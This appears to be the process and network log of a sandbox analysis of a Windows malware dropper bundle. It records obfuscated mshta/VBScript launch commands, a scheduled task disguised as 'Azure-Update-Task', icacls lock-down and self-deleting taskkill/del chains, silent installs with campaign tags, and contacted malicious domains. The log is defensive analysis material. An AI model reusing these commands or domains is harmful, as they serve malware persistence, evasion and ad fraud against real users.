Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19c6762a08beae.exe

Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat1946eb84e6.exe

Sat1946eb84e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19ba05e89ea6d406.exe

Sat19ba05e89ea6d406.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat199ba8a4637dcb034.exe

Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e4750dd01.exe

Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SP2J3.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$60136,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19ba05e89ea6d406.exe"

C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe

"C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe" /S /UID=burnerch2

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat19e4750dd01.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19e4750dd01.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat19e4750dd01.exe" /f

C:\ProgramData\795168.exe

"C:\ProgramData\795168.exe"

C:\ProgramData\8209560.exe

"C:\ProgramData\8209560.exe"

C:\ProgramData\6384253.exe

"C:\ProgramData\6384253.exe"

C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe

"C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\f5-5904a-b33-73c84-e4f8fc1c025d0\Vososamime.exe

"C:\Users\Admin\AppData\Local\Temp\f5-5904a-b33-73c84-e4f8fc1c025d0\Vososamime.exe"

C:\ProgramData\5771500.exe

"C:\ProgramData\5771500.exe"

C:\Users\Admin\AppData\Local\Temp\7e-3199b-ad4-385bd-5a896535a5cb6\Maeqeshyhoto.exe

"C:\Users\Admin\AppData\Local\Temp\7e-3199b-ad4-385bd-5a896535a5cb6\Maeqeshyhoto.exe"

C:\ProgramData\7915684.exe

"C:\ProgramData\7915684.exe"

C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp" /SL5="$30180,281924,62464,C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe" /VERYSILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\5771500.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\5771500.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 976

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\5771500.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\5771500.exe") do taskkill -Im "%~nxl" /F

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "5771500.exe" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:275457 /prefetch:2

C:\ProgramData\6384253.exe

"C:\ProgramData\6384253.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 560 -s 1760

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2872 -s 1732

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe /eufive & exit

C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe /eufive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe /qn CAMPAIGN="654" & exit

C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe

C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe /qn CAMPAIGN="654"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe & exit

C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe

C:\Users\Admin\AppData\Local\Temp\uugw3lq1.b1o\anyname.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe /mixfive & exit

C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe /mixfive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2po3pay4.up2\autosubplayer.exe /S & exit

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3357038103890CB74DA0F3E186CE311B C

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\w0mdl44t.swb\GcleanerEU.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "GcleanerEU.exe" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\paau0ga2.dmq\gcleaner.exe" & exit

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jaoqpigf.zbc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133451 /qn CAMPAIGN=""654"" " CAMPAIGN="654"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "gcleaner.exe" /f

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9F390E3CD75E85D9C096B2FC1D2786C4

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding ADA8DC425C27DE4B120E8174DFE95230 M Global\MSI0000

C:\Users\Admin\AppData\Local\Temp\510D.exe

C:\Users\Admin\AppData\Local\Temp\510D.exe

C:\Users\Admin\AppData\Local\Temp\6AA6.exe

C:\Users\Admin\AppData\Local\Temp\6AA6.exe

C:\Users\Admin\AppData\Local\Temp\8BAE.exe

C:\Users\Admin\AppData\Local\Temp\8BAE.exe

C:\Users\Admin\AppData\Local\Temp\8BAE.exe

C:\Users\Admin\AppData\Local\Temp\8BAE.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\8BAE.exe

"C:\Users\Admin\AppData\Local\Temp\8BAE.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\8BAE.exe

"C:\Users\Admin\AppData\Local\Temp\8BAE.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\BEEF.exe

C:\Users\Admin\AppData\Local\Temp\BEEF.exe

C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe

"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe"

C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe

"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe"

C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe

"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"

C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe

"C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\system32\taskeng.exe

taskeng.exe {9A49859D-4422-408C-A7FB-6EBFD1C6673C} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im build2.exe /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Users\Admin\AppData\Local\Temp\4010.exe

C:\Users\Admin\AppData\Local\Temp\4010.exe

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-244508444862206081-212929308874554396-3793658631545669950119089633970821402"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\BEEF.exe"

C:\Users\Admin\AppData\Local\Temp\WnUKuKwEyu.exe

"C:\Users\Admin\AppData\Local\Temp\WnUKuKwEyu.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\629F.exe

C:\Users\Admin\AppData\Local\Temp\629F.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im 629F.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\629F.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im 629F.exe /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Users\Admin\AppData\Local\Temp\A8B4.exe

C:\Users\Admin\AppData\Local\Temp\A8B4.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1586187 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\A8B4.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:734242 /prefetch:2

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1192990 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:799774 /prefetch:2

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {7C2F96A0-D5EF-44D5-978F-EB09A410BAE3} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:799796 /prefetch:2

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:734281 /prefetch:2

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\avwvuuw

C:\Users\Admin\AppData\Roaming\avwvuuw

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:1258587 /prefetch:2

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:4011062 /prefetch:2

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\avwvuuw

C:\Users\Admin\AppData\Roaming\avwvuuw

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=1294231

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe

C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe --Task

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:472177 /prefetch:2

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 hsiens.xyz udp
US 172.67.142.91:80 hsiens.xyz tcp
US 8.8.8.8:53 a.goatgame.co udp
US 172.67.146.70:443 a.goatgame.co tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 144.202.76.47:443 www.listincode.com tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
